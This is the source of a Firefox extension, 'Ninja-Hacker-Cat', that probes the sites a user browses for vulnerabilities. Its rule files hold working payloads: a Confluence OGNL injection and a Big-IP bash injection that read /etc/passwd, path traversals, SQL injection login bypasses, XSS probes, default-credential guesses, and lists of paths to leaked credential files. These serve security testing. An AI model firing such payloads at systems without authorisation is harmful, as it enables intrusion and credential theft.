https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-default-grey.png -------------------------------------------------------------------------------- /images/cat-default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-default.png -------------------------------------------------------------------------------- /images/cat-laugh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-laugh.png -------------------------------------------------------------------------------- /images/cat-love.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-love.png -------------------------------------------------------------------------------- /images/cat-omg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-omg.png -------------------------------------------------------------------------------- /images/cat-panic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-panic.png -------------------------------------------------------------------------------- /manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "manifest_version": 2, 3 | "name": "Ninja-Hacker-Cat", 4 | "description": "Cute Script Kitty makes web security checks for you!", 5 | "version": "1.7", 6 | "browser_action": { 7 | "default_icon": "/images/cat-default-grey.png", 8 | "default_title": "Miau!" 9 | }, 10 | "background": { 11 | "scripts": ["/scripts/background.js"] 12 | }, 13 | "permissions": [ 14 | "notifications", 15 | "webRequest", 16 | "<all_urls>" 17 | ] 18 | } -------------------------------------------------------------------------------- /panel.css: -------------------------------------------------------------------------------- 1 | html, 2 | body { 3 | font-family: 'Nix 8810'; 4 | box-sizing: border-box; 5 | background-color: #222; 6 | color: #f49917; 7 | font-size: 16px; 8 | } 9 | 10 | a, 11 | a:hover, 12 | a:visited { 13 | color: #cd7b0a; 14 | } 15 | 16 | a#reset { 17 | text-decoration: none; 18 | } 19 | 20 | #main { 21 | position: relative; 22 | margin: 20px auto; 23 | max-width: 800px; 24 | } 25 | 26 | #sidebar { 27 | position: absolute; 28 | top: 0; 29 | left: 0; 30 | width: 200px; 31 | } 32 | 33 | #content { 34 | position: absolute; 35 | top: 0px; 36 | left: 250px; 37 | width: 50%; 38 | max-width: 500px; 39 | min-width: 250px; 40 | } 41 | 42 | #footer { 43 | position: fixed; 44 | bottom: 10px; 45 | right: 10px; 46 | } 47 | 48 | .avatar { 49 | max-width: 250px; 50 | } 51 | 52 | input { 53 | margin-left: -1px; 54 | } 55 | 56 | .checkbox-deactivated { 57 | color: #333; 58 | } 59 | 60 | .small { 61 | font-size: 70%; 62 | } 63 | 64 | .reset { 65 | border: none; 66 | padding: 10px; 67 | width: 100%; 68 | text-align: center; 69 | cursor: pointer; 70 | color: #333; 71 | } 72 | 73 | .stats { 74 | font-size: 80%; 75 | margin-left: 24px; 76 | } 77 | 78 | .message { 79 | background-color: #d6810e0a; 80 | padding: 10px; 81 | margin: 5px 0px; 82 | font-size: 18px; 83 | border-radius: 5px; 84 | box-shadow: 3px 3px #1a1a1a; 85 | border: 1px solid #000; 86 | word-wrap: anywhere; 87 | word-break: break-all; 88 | } 89 | 90 | .message a { 91 | font-size: 80%; 92 | display: -webkit-box; 93 | -webkit-line-clamp: 4; 94 | -webkit-box-orient: vertical; 95 | overflow: hidden; 96 | } 97 | 98 | .message .size, 99 | .message .detect { 100 | font-size: 75%; 101 | color: rgb(168, 111, 36); 102 | } 103 | 104 | .title { 105 | font-weight: bold; 106 | } 107 | 108 | .status { 109 | color: rgb(198, 186, 30); 110 | } 111 | 112 | .avatar { 113 | display: none; 114 | } 115 | 116 | .avatar-left { 117 | transform: scaleX(-1); 118 | margin-left: -50px; 119 | } 120 | 121 | .hidden { 122 | display: none; 123 | } 124 | 125 | @font-face { 126 | font-family: "Nix 8810"; 127 | src: url(Nix8810.woff); 128 | } 129 | 130 | @media screen and (max-width: 530px) { 131 | #sidebar { 132 | position: initial; 133 | width: 100%; 134 | } 135 | #content { 136 | position: initial; 137 | width: 100%; 138 | } 139 | #footer { 140 | position: initial; 141 | } 142 | .avatar { 143 | margin: 0 auto; 144 | } 145 | } -------------------------------------------------------------------------------- /panel.html: -------------------------------------------------------------------------------- 1 | <!DOCTYPE html> 2 | <html> 3 | 4 | <head> 5 | <meta charset="utf-8"> 6 | <link rel="icon" href="/images/cat-default.png"> 7 | <link rel="stylesheet" href="panel.css" /> 8 | <!-- Info: title is used to check if this tab is open --> 9 | <title>✔ Active Ninja Hacker Cat 10 | 11 | 12 | 13 |
14 | 15 | 16 | 55 |
56 |
57 | 58 |

59 | Dear human,
60 | thanks for checking your web applications for baaaaad 61 | security vulnerabilities. Ninja Hacker Cat is free and my source code 62 | can be found on GitHub. 63 |

64 |

65 | If you close this tab (or uncheck the box) i will stop snooping around 66 | and take a nap. 67 |

68 |

69 | You can buy me cat food with 70 | GitHub 71 | or Ko-Fi. 72 |

73 |

74 | xoxo, 😻 Script Kitty! 75 |

76 |
77 |
78 | 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # Ninja-Hacker-Cat Sidebar für Firefox 2 | This firefox extension can check your website for the most basic 3 | security issues and data leaks. It's an easy way to test the basic security of 4 | your websites! 5 | 6 | ## Installation 7 | Install the extension in firefox: 8 | 9 | Firefox Add-Ons 10 | 11 | 12 | Temporary installation: 13 | * Settings 14 | * Debug extension 15 | * New extension -> Open `manifest.json` 16 | 17 | ## How to test these features 18 | You can test some features against wackopicko, juice shop. 19 | CVEs can be tested against vulhub e.g. confluence. 20 | 21 | ``` bash 22 | docker run --rm -p 8080:3000 bkimminich/juice-shop 23 | docker run --rm -p 8080:80 adamdoupe/wackopicko 24 | ``` 25 | 26 | Try: http://localhost:8080/ afterwards. 27 | 28 | # Rules 29 | `engine/detection.js`: Try to understand the current web service and trigger 30 | the rules that match these application "tags". 31 | 32 | `rules/leak-urls.js`: Contains filenames that maybe interessting -> WP-Backups, 33 | GIT-Leaks. 34 | 35 | `rules/poc.js`: Contains proof of concepts for critical security issues -> 36 | Confluence RCE. 37 | 38 | `rules/versions.js`: Contains rules for version grabbing and detecting 39 | vulnerable versions -> Exchange RCE. 40 | 41 | `rules/web.js`: Contains rules for web vulnerabilities based on URL. -> SQLi, 42 | Keywords. 43 | 44 | `rules/fuzzing.js`: Contains rules for fuzzing GET and POST params based on 45 | current WebRequest. -> XSS, SQLi. 46 | 47 | ## TODO 48 | * [ ] Add headers and postJSON for poc.js 49 | * [ ] Add response size check to rules 50 | * [ ] Change exchange proxyshell detection to passive mode 51 | * [ ] Add website detection for big-ip, citrix, cisco, pulse 52 | * [ ] Add fuzzing param filter 53 | * [X] Add request limit (timer) 54 | * [X] Add fuzzing for get params 55 | * [X] Refactoring fuzzing (only change one param per request)! 56 | * [X] Wrapper for fetch requests to count 57 | * [X] Test fuzzing form data 58 | * [X] Add securityinfo.txt 59 | * [X] Version detection 60 | * [X] Check for leaky urls in current tab 61 | 62 | ## Detections 63 | * [ ] Wordpress Version 64 | * [ ] PHP Version 65 | * [ ] SQL Injection based on Header/Cookies 66 | * [ ] IDOR based on GET-Param 67 | * [ ] Path traversal 68 | * [ ] OS Command Injection (https://portswigger.net/support/using-burp-to-test-for-os-command-injection-vulnerabilities) 69 | * [ ] Big-IP RCE (https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py) 70 | * [ ] ManageEngine ADSelfService (https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html) 71 | * [X] XSS Tests in GET-Param (tested) 72 | * [X] SQL Injection based on GET-Param (tested) 73 | * [X] SQL Injection Login bypass (JSON, tested) 74 | * [X] Bitbucket RCE (version only, tested) 75 | * [X] Confluence RCE (PoC, tested) 76 | * [X] Exchange Proxyshell (PoC, untested) 77 | * [X] Apache (version only, untested) 78 | * [X] Weblogic Console (PoC, tested) 79 | 80 | # CVEs 81 | The CVEs this browser extension can detect: 82 | Confluence Server (CVE-2022-26134), Bitbucket Server (CVE-2022-36804), 83 | Exchange Server Proxyshell (CVE-2021-34473), Apache (CVE-2021-41773), 84 | Weblogic Console (CVE-2020-14882). 85 | 86 | # Deployment 87 | ``` bash 88 | zip -r Ninja-Hacker-Cat.zip . -x ".*" -x "images/.*" 89 | ``` 90 | 91 | # Release notes 92 | Version: 1.7 93 | * Fix doublicated requests and messages 94 | 95 | Version: 1.6 96 | * Fix version detection rules 97 | * Configure attack rules with checkboxes 98 | * Faster requests (less requests with rule checkboxes) 99 | 100 | Version: 1.5 101 | * Improved detection of SQL injection 102 | * Improved global request timer 103 | 104 | Version: 1.4 105 | * Improve visuals of script kitty activity 106 | * Leaks added: SQL backup, git credentials, backup files, etc 107 | 108 | Version: 1.3 109 | * Subdomain detection added 110 | * Browser notification added 111 | * Fixed fuzzing engine for post params 112 | * Cat images changed to a lovely kitty 113 | * Untested PoCs added 114 | 115 | Version: 1.2 116 | * License changed to Mozilla Public License 2.0 because its not allowed to use logo / visuals 117 | * Fixing the root urls if a port is specified -> Tested RCE: Weblogic Console (CVE-2020-14882) 118 | * Changing the interface from panel in background to icon and full background page 119 | 120 | # Copyright 121 | Source Code is under Mozilla Public License 2.0 122 | 123 | All rights reserved for the plugin name, artworks, logo and images 124 | (all cat images)! 125 | 126 | Copyright 1337core, 2022 127 | 128 | https://www.1337core.de -------------------------------------------------------------------------------- /rules/fuzzing.js: -------------------------------------------------------------------------------- 1 | export const fuzzing = [ 2 | // This rules are running in fuzzing-engine and will be executed against 3 | // the current captured webrequest! 4 | { 5 | title: "Bypass: SQL Injection", 6 | postParams: [ 7 | "'-- ", 8 | "' or 'a'='a'-- " 9 | ], 10 | filterPostParams: [ 11 | "id", 12 | "guid", 13 | "username", 14 | "user", 15 | "login", 16 | "password", 17 | "pass" 18 | ], 19 | filterStatusCodes: ["302", "200", "500"], 20 | detectResponses: ["auth", "logout", "syntax error"], 21 | cat: "cat-panic", 22 | critLevel: 3 23 | }, 24 | { 25 | title: "Default Keywords", 26 | postParams: [ 27 | "admin", 28 | "test", 29 | "dev", 30 | "testing", 31 | "guest" 32 | ], 33 | filterPostParams: [ 34 | "username", 35 | "user", 36 | "login", 37 | "password", 38 | "pass" 39 | ], 40 | isRedirected: true, 41 | replaceParamValue: true, 42 | detectStatusCodes: ["200"], 43 | cat: "cat-laugh", 44 | critLevel: 1 45 | } 46 | ] 47 | 48 | -------------------------------------------------------------------------------- /rules/leak-urls.js: -------------------------------------------------------------------------------- 1 | export const leakUrls = [ 2 | { 3 | title: "Git Config", // the title of the alert message 4 | paths: [ // this stuff will be after the current url 5 | "/.git/", 6 | "/.git/config" 7 | ], 8 | detectResponses: ["remote"], // check this response in body 9 | filterStatusCodes: ["200"], // only check other detect values if response code matches 10 | detectStatusCodes: ["200"], // alert is based on response code 11 | tags: ["root"], // only run this rule if these tags where detected on the website 12 | cat: "cat-laugh", // change the avatar to this image 13 | critLevel: 1 // 1,2,3 critlevel is for showing the most critical kitten 14 | }, 15 | { 16 | title: "Helm Config", 17 | rootPaths: [ 18 | "/.helm/values.yaml" 19 | ], 20 | detectResponses: ["password"], 21 | filterStatusCodes: ["200"], 22 | tags: ["root"], 23 | cat: "cat-laugh", 24 | critLevel: 2 25 | }, 26 | { 27 | title: "Nginx Config", 28 | rootPaths: [ 29 | "/nginx/nginx.conf", 30 | "/nginx.conf" 31 | ], 32 | detectResponses: ["server"], 33 | filterStatusCodes: ["200"], 34 | tags: ["nginx"], 35 | cat: "cat-laugh", 36 | critLevel: 1 37 | }, 38 | { 39 | title: "Nginx - Git Configuration Exposure", 40 | rootPaths: [ 41 | '/static../.git/config', 42 | '/js../.git/config', 43 | '/images../.git/config', 44 | '/img../.git/config', 45 | '/css../.git/config', 46 | '/assets../.git/config', 47 | '/content../.git/config', 48 | '/events../.git/config', 49 | '/media../.git/config', 50 | '/lib../.git/config' 51 | ], 52 | detectResponses: ["[core]"], 53 | filterStatusCodes: ["200"], 54 | tags: ["nginx"], 55 | cat: "cat-laugh", 56 | critLevel: 2 57 | }, 58 | { 59 | title: "Git Credentials Disclosure", 60 | rootPaths: [ 61 | '/.git-credentials' 62 | ], 63 | detectResponses: ["[credential"], 64 | filterStatusCodes: ["200"], 65 | tags: ["all"], 66 | cat: "cat-laugh", 67 | critLevel: 2 68 | }, 69 | { 70 | title: "WP-Config Backup", 71 | rootPaths: [ 72 | "/wp-config.php~", 73 | "/wp-config.php.bak", 74 | "/wp-config.php.backup", 75 | "/wp-config.bak", 76 | "/wp-config.php.bkp", 77 | "/wp-config.php.copy", 78 | "/wp-config.php.old", 79 | "/wp-config.php.orig", 80 | "/wp-config.php.save", 81 | "/wp-config.php.swp", 82 | "/wp-config.php.temp", 83 | "/wp-config.php.tmp" 84 | ], 85 | detectResponses: ["DB_PASSWORD"], 86 | filterStatusCodes: ["200"], 87 | tags: ["wordpress", "wp"], 88 | cat: "cat-panic", 89 | critLevel: 3 90 | }, 91 | { 92 | title: "WP-Content File Listing", 93 | rootPaths: [ 94 | "/wp-content/" 95 | ], 96 | detectResponses: [ 97 | "Index of" 98 | ], 99 | filterStatusCodes: ["200"], 100 | tags: ["wordpress", "wp"], 101 | cat: "cat-default", 102 | critLevel: 2 103 | }, 104 | { 105 | title: "SQL Backup", 106 | rootPaths: [ 107 | "/mysql.initial.sql", 108 | "/db.sql", 109 | "/dump.sql", 110 | "/backup.zip", 111 | "/backup.sql", 112 | "/backup.old", 113 | "/data.sql", 114 | "/data.old", 115 | "/temp.sql", 116 | "/users.sql" 117 | ], 118 | detectResponses: [ 119 | "INSERT INTO", 120 | "Roundcube Webmail initial database structure" 121 | ], 122 | filterStatusCodes: ["200"], 123 | tags: ["all"], 124 | cat: "cat-panic", 125 | critLevel: 2 126 | }, 127 | { 128 | title: "Webserver Backupfiles", 129 | paths: [ 130 | "/main.php.bak", 131 | "/config.php.bak", 132 | "/db.php.bak", 133 | "/database.php.bak", 134 | ], 135 | detectResponses: [ 136 | "" 205 | ], 206 | filterStatusCodes: ["200"], 207 | tags: ["all"], 208 | cat: "cat-laugh", 209 | critLevel: 1 210 | }, 211 | { 212 | title: "Clockwork PHP page exposure", 213 | rootPaths: [ 214 | "/__clockwork/app" 215 | ], 216 | detectResponses: [ 217 | "Clockwork" 218 | ], 219 | filterStatusCodes: ["200"], 220 | tags: ["all"], 221 | cat: "cat-default", 222 | critLevel: 2 223 | }, 224 | { 225 | title: "Rails Debug Mode", 226 | rootPaths: [ 227 | "/jkfnjdknfkdnfgkdsng" 228 | ], 229 | detectResponses: [ 230 | "Action Controller: Exception caught" 231 | ], 232 | filterStatusCodes: ["200"], 233 | tags: ["root"], 234 | cat: "cat-default", 235 | critLevel: 1 236 | }, 237 | { 238 | title: "Roundcube Logs", 239 | rootPaths: [ 240 | "/roundcube/logs/sendmail", 241 | "/roundcube/logs/errors.log" 242 | ], 243 | detectResponses: [ 244 | "IMAP Error:" 245 | ], 246 | filterStatusCodes: ["200"], 247 | tags: ["roundcube"], 248 | cat: "cat-laugh", 249 | critLevel: 1 250 | }, 251 | { 252 | title: "BitBucket Pipelines Configuration", 253 | rootPaths: [ 254 | "/bitbucket-pipelines.yml" 255 | ], 256 | detectResponses: [ 257 | "pipelines:" 258 | ], 259 | filterStatusCodes: ["200"], 260 | tags: ["all"], 261 | cat: "cat-laugh", 262 | critLevel: 2 263 | }, 264 | { 265 | title: "Composer-auth JSON File Disclosure", 266 | rootPaths: [ 267 | "/.composer-auth.json", 268 | "/vendor/webmozart/assert/.composer-auth.json" 269 | ], 270 | detectResponses: [ 271 | "github-oauth" 272 | ], 273 | filterStatusCodes: ["200"], 274 | tags: ["all"], 275 | cat: "cat-default", 276 | critLevel: 2 277 | }, 278 | { 279 | title: "Drupal Install", 280 | rootPaths: [ 281 | "/install.php?profile=default" 282 | ], 283 | detectResponses: [ 284 | "Choose language | Drupal" 285 | ], 286 | filterStatusCodes: ["200"], 287 | tags: ["drupal"], 288 | cat: "cat-laugh", 289 | critLevel: 2 290 | }, 291 | { 292 | title: "Drupal User Listing", 293 | rootPaths: [ 294 | "/jsonapi/user/user" 295 | ], 296 | detectResponses: [ 297 | "display_name" 298 | ], 299 | filterStatusCodes: ["200"], 300 | tags: ["drupal"], 301 | cat: "cat-laugh", 302 | critLevel: 2 303 | }, 304 | { 305 | title: "Public Swagger API", 306 | rootPaths: [ 307 | "/swagger-ui/swagger-ui.js", 308 | "/swagger/swagger-ui.js", 309 | "/swagger-ui.js", 310 | "/swagger/ui/swagger-ui.js", 311 | "/swagger/ui/index", 312 | "/swagger/index.html", 313 | "/swagger-ui.html", 314 | "/swagger/swagger-ui.html", 315 | "/api/swagger-ui.html", 316 | "/api-docs/swagger.json", 317 | "/api-docs/swagger.yaml", 318 | "/api_docs", 319 | "/swagger.json", 320 | "/swagger.yaml", 321 | "/swagger/v1/swagger.json", 322 | "/swagger/v1/swagger.yaml", 323 | "/api/index.html", 324 | "/api/docs/", 325 | "/api/swagger.json", 326 | "/api/swagger.yaml", 327 | "/api/swagger.yml", 328 | "/api/swagger/index.html", 329 | "/api/swagger/swagger-ui.html", 330 | "/api/api-docs/swagger.json", 331 | "/api/api-docs/swagger.yaml", 332 | "/api/swagger-ui/swagger.json", 333 | "/api/swagger-ui/swagger.yaml", 334 | "/api/apidocs/swagger.json", 335 | "/api/apidocs/swagger.yaml", 336 | "/api/swagger-ui/api-docs", 337 | "/api/api-docs", 338 | "/api/apidocs", 339 | "/api/swagger", 340 | "/api/swagger/static/index.html", 341 | "/api/swagger-resources", 342 | "/api/swagger-resources/restservices/v2/api-docs", 343 | "/api/__swagger__/", 344 | "/api/_swagger_/", 345 | "/api/spec/swagger.json", 346 | "/api/spec/swagger.yaml", 347 | "/api/swagger/ui/index", 348 | "/__swagger__/", 349 | "/_swagger_/", 350 | "/api/v1/swagger-ui/swagger.json", 351 | "/api/v1/swagger-ui/swagger.yaml", 352 | "/swagger-resources/restservices/v2/api-docs", 353 | "/api/swagger_doc.json" 354 | ], 355 | detectResponses: [ 356 | "swagger:", 357 | "Swagger UI" 358 | ], 359 | filterStatusCodes: ["200"], 360 | tags: ["all"], 361 | cat: "cat-laugh", 362 | critLevel: 1 363 | }, 364 | { 365 | title: "Filezilla Config", 366 | rootPaths: [ 367 | "/filezilla.xml", 368 | "/sitemanager.xml", 369 | "/FileZilla.xml" 370 | ], 371 | detectResponses: [ 372 | "coremail' 500 | ], 501 | filterStatusCodes: ["200"], 502 | tags: ["all"], 503 | cat: "cat-panic", 504 | critLevel: 3 505 | }, 506 | { 507 | title: "Dockerfile Hidden Disclosure", 508 | rootPaths: [ 509 | "/.dockerfile", 510 | "/.Dockerfile" 511 | ], 512 | detectResponses: [ 513 | 'FROM' 514 | ], 515 | filterStatusCodes: ["200"], 516 | tags: ["all"], 517 | cat: "cat-laugh", 518 | critLevel: 2 519 | }, 520 | { 521 | title: "docker-compose.yml exposure", 522 | rootPaths: [ 523 | "/docker-compose.yml", 524 | "/docker-compose.prod.yml", 525 | "/docker-compose.production.yml", 526 | "/docker-compose.staging.yml", 527 | "/docker-compose.dev.yml", 528 | "/docker-compose-dev.yml", 529 | "/docker-compose.override.yml" 530 | ], 531 | detectResponses: [ 532 | 'services:' 533 | ], 534 | filterStatusCodes: ["200"], 535 | tags: ["all"], 536 | cat: "cat-laugh", 537 | critLevel: 2 538 | }, 539 | { 540 | title: "FTP credentials exposure", 541 | rootPaths: [ 542 | "/ftpsync.settings" 543 | ], 544 | detectResponses: [ 545 | 'overwrite_newer_prevention' 546 | ], 547 | filterStatusCodes: ["200"], 548 | tags: ["all"], 549 | cat: "cat-laugh", 550 | critLevel: 2 551 | }, 552 | { 553 | title: "FTP credentials exposure", 554 | rootPaths: [ 555 | "/ftpsync.settings" 556 | ], 557 | detectResponses: [ 558 | 'overwrite_newer_prevention' 559 | ], 560 | filterStatusCodes: ["200"], 561 | tags: ["all"], 562 | cat: "cat-laugh", 563 | critLevel: 2 564 | }, 565 | { 566 | title: "Info: Subdomain", 567 | subdomains: [ 568 | "mail", 569 | "imap", 570 | "smtp", 571 | "weblogic", 572 | "api", 573 | "exchange", 574 | "owa", 575 | "backend", 576 | "backup", 577 | "build", 578 | "bitbucket", 579 | "citrix", 580 | "chat", 581 | "talk", 582 | "community", 583 | "console", 584 | "terminal", 585 | "confluence", 586 | "conf", 587 | "data", 588 | "database", 589 | "sql", 590 | "mysql", 591 | "demo", 592 | "dev", 593 | "development", 594 | "downloads", 595 | "download", 596 | "drupal", 597 | "files", 598 | "file", 599 | "firewall", 600 | "ftp", 601 | "home", 602 | "jobs", 603 | "mobile", 604 | "auth", 605 | "wordpress", 606 | "blog", 607 | "weblog", 608 | "webmail", 609 | "server", 610 | "admin", 611 | "git", 612 | "login", 613 | "logs", 614 | "registry", 615 | "internal", 616 | "intern", 617 | "config", 618 | "vpn", 619 | "vnc", 620 | "scanme" 621 | ], 622 | skipRedirected: true, 623 | detectStatusCodes: ["200"], 624 | tags: ["all"], 625 | cat: "cat-default", 626 | critLevel: 0 627 | }, 628 | { 629 | title: "Info: Dev Port", 630 | ports: [ 631 | "8080", 632 | "8081", 633 | "4434", 634 | "5000", 635 | "3000", 636 | "3001", 637 | "4000", 638 | "4443", 639 | "5000", 640 | "5001", 641 | "8443" 642 | ], 643 | detectStatusCodes: ["200"], 644 | tags: ["all"], 645 | cat: "cat-default", 646 | critLevel: 0 647 | } 648 | ] -------------------------------------------------------------------------------- /rules/poc.js: -------------------------------------------------------------------------------- 1 | export const poc = [{ 2 | // UNTESTED!!! remove and test version 3 | title: "RCE: Exchange Server Proxyshell (CVE-2021-34473)", 4 | rootPaths: [ 5 | "/autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@foo.com" 6 | ], 7 | detectResponses: ["Connectivity Endpoint"], 8 | tags: ["exchange"], 9 | cat: "cat-panic", 10 | critLevel: 3 11 | }, 12 | { 13 | // UNTESTED!!! 14 | title: "LFI: Pulse Secure Pulse (CVE-2019-11510)", 15 | rootPaths: [ 16 | "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/" 17 | ], 18 | detectResponses: ["root"], 19 | detectStatusCodes: ["200"], 20 | tags: ["pulse"], 21 | cat: "cat-panic", 22 | critLevel: 2 23 | }, 24 | { 25 | title: "RCE: Confluence Server (CVE-2022-26134)", 26 | rootPaths: [ 27 | //'%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat /etc/passwd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/' 28 | "/%24%7B%28%23a%3D%40org%2Eapache%2Ecommons%2Eio%2EIOUtils%40toString%28%40java%2Elang%2ERuntime%40getRuntime%28%29%2Eexec%28%22cat /etc/passwd%22%29%2EgetInputStream%28%29%2C%22utf%2D8%22%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsetHeader%28%22X%2DCmd%2DResponse%22%2C%23a%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsendError%28500%29%29%7D/" 29 | ], 30 | detectHeaders: ["x-cmd-response"], 31 | tags: ["confluence"], 32 | cat: "cat-panic", 33 | critLevel: 3 34 | }, { 35 | // UNTESTED!!! 36 | title: "Apache APISIX (CVE-2022-24112 )", 37 | rootPaths: [ 38 | "/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1" 39 | ], 40 | detectStatusCodes: ["200"], 41 | tags: ["apache"], 42 | cat: "cat-panic", 43 | critLevel: 3 44 | }, { 45 | // UNTESTED!!! 46 | title: "RCE: Cisco Hyperflex (CVE-2021-1497)", 47 | rootPaths: [ 48 | "/css/..%2findex.htm" 49 | ], 50 | detectStatusCodes: ["200"], 51 | tags: ["cisco"], 52 | cat: "cat-panic", 53 | critLevel: 3 54 | }, { 55 | // UNTESTED!!! 56 | title: "RCE: Citrix (CVE-2019-19781)", 57 | rootPaths: [ 58 | "/vpn/../vpns/cfg/smb.conf", 59 | ], 60 | detectStatusCodes: ["200"], 61 | tags: ["citrix"], 62 | cat: "cat-panic", 63 | critLevel: 3 64 | }, 65 | { 66 | title: "RCE: Weblogic Console (CVE-2020-14882)", 67 | rootPaths: [ 68 | "/console/css/%252e%252e%252fconsole.portal" 69 | ], 70 | detectStatusCodes: ["200"], 71 | tags: ["weblogic"], 72 | cat: "cat-panic", 73 | critLevel: 3 74 | }, { 75 | // UNTESTED 76 | title: "RCE: Big-IP (CVE-2022-1388)", 77 | method: "POST", 78 | rootPaths: [ 79 | "/mgmt/tm/util/bash" 80 | ], 81 | headers: { 82 | 'Host': '127.0.0.1', 83 | 'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=', 84 | 'X-F5-Auth-Token': 'asdf', 85 | 'Connection': 'X-F5-Auth-Token', 86 | 'Content-Type': 'application/json' 87 | }, 88 | postJSON: { "command": "run", "utilCmdArgs": "-c 'cat /etc/passwd}'" }, 89 | detectResponses: ["root"], 90 | tags: ["big-ip"], 91 | cat: "cat-panic", 92 | critLevel: 3 93 | }] -------------------------------------------------------------------------------- /rules/versions.js: -------------------------------------------------------------------------------- 1 | export const versions = [ 2 | { 3 | title: "Info: Security Text", 4 | rootPaths: [ 5 | "/.well-known/security.txt" 6 | ], 7 | detectStatusCodes: ["200"], 8 | tags: ["all"], 9 | cat: "cat-default", 10 | critLevel: 0 11 | }, { 12 | title: "RCE: Bitbucket Server (CVE-2022-36804)", 13 | minVersion: "7.0.0", 14 | maxVersion: "8.3.0", 15 | regexVersion: "v\\s*([\\d\\.]+)\\s*<\\/span>", 16 | tags: ["bitbucket"], 17 | detectedBy: "regex version", 18 | cat: "cat-panic", 19 | critLevel: 3 20 | }, { 21 | title: "RCE: Apache (CVE-2021-41773)", 22 | minVersion: "2.4.49", 23 | maxVersion: "2.4.50", 24 | regexVersion: "Apache\\/([\\d\\.]+)", 25 | matchRegexHeaderName: "Server", 26 | tags: ["apache"], 27 | detectedBy: "header", 28 | cat: "cat-panic", 29 | critLevel: 3 30 | }, { 31 | title: "RCE: Apache (CVE-2021-40438)", 32 | minVersion: "2.4.17", 33 | maxVersion: "2.4.48", 34 | regexVersion: "Apache\\/([\\d\\.]+)", 35 | matchRegexHeaderName: "Server", 36 | tags: ["apache"], 37 | detectedBy: "header", 38 | cat: "cat-panic", 39 | critLevel: 3 40 | }, { 41 | title: "RCE (authenticated): Exchange 2019 (CVE-2022-41040 and CVE-2022-41082)", 42 | minVersion: "15.2.1118", 43 | maxVersion: "15.2.1118", 44 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 45 | tags: ["exchange", "owa"], 46 | detectedBy: "css-font-path", 47 | cat: "cat-panic", 48 | critLevel: 2 49 | }, { 50 | title: "RCE (authenticated): Exchange 2016 (CVE-2022-41040 and CVE-2022-41082)", 51 | minVersion: "15.1.2507", 52 | maxVersion: "15.1.2507", 53 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 54 | tags: ["exchange", "owa"], 55 | detectedBy: "css-font-path", 56 | cat: "cat-panic", 57 | critLevel: 2 58 | }, { 59 | title: "RCE (authenticated): Exchange 2013 (CVE-2022-41040 and CVE-2022-41082)", 60 | minVersion: "15.0.1497", 61 | maxVersion: "15.0.1497", 62 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 63 | tags: ["exchange", "owa"], 64 | detectedBy: "css-font-path", 65 | cat: "cat-panic", 66 | critLevel: 2 67 | }, { 68 | title: "Exchange 2010 (oudated)", 69 | minVersion: "14.3.513", 70 | maxVersion: "14.3.513", 71 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 72 | tags: ["exchange", "owa"], 73 | detectedBy: "css-font-path", 74 | cat: "cat-panic", 75 | critLevel: 2 76 | }, { 77 | title: "RCE: Exchange 2019 Proxyshell (CVE-2021-34473)", 78 | minVersion: "15.2.221", 79 | maxVersion: "15.2.858", 80 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 81 | tags: ["exchange", "owa"], 82 | detectedBy: "css-font-path", 83 | cat: "cat-panic", 84 | critLevel: 3 85 | }, { 86 | title: "RCE: Exchange 2016 Proxyshell (CVE-2021-34473)", 87 | minVersion: "15.2.221", 88 | maxVersion: "15.1.2308", 89 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 90 | tags: ["exchange", "owa"], 91 | detectedBy: "css-font-path", 92 | cat: "cat-panic", 93 | critLevel: 3 94 | }, { 95 | title: "RCE: Exchange 2016 Proxyshell (CVE-2021-34473)", 96 | minVersion: "15.2.221", 97 | maxVersion: "15.0.1497", 98 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 99 | tags: ["exchange", "owa"], 100 | detectedBy: "css-font-path", 101 | cat: "cat-panic", 102 | critLevel: 3 103 | }] -------------------------------------------------------------------------------- /rules/web.js: -------------------------------------------------------------------------------- 1 | export const web = [{ 2 | title: "XSS: Cross Site Scripting", 3 | params: [ 4 | "\"'>" 5 | ], 6 | detectResponses: [ 7 | "\"'>" 8 | ], 9 | tags: ["get-param"], 10 | cat: "cat-love", 11 | critLevel: 2 12 | }, 13 | { 14 | title: "SQLI: SQL Injection Error Page", 15 | params: [ 16 | "'", 17 | "\"'" 18 | ], 19 | detectResponses: 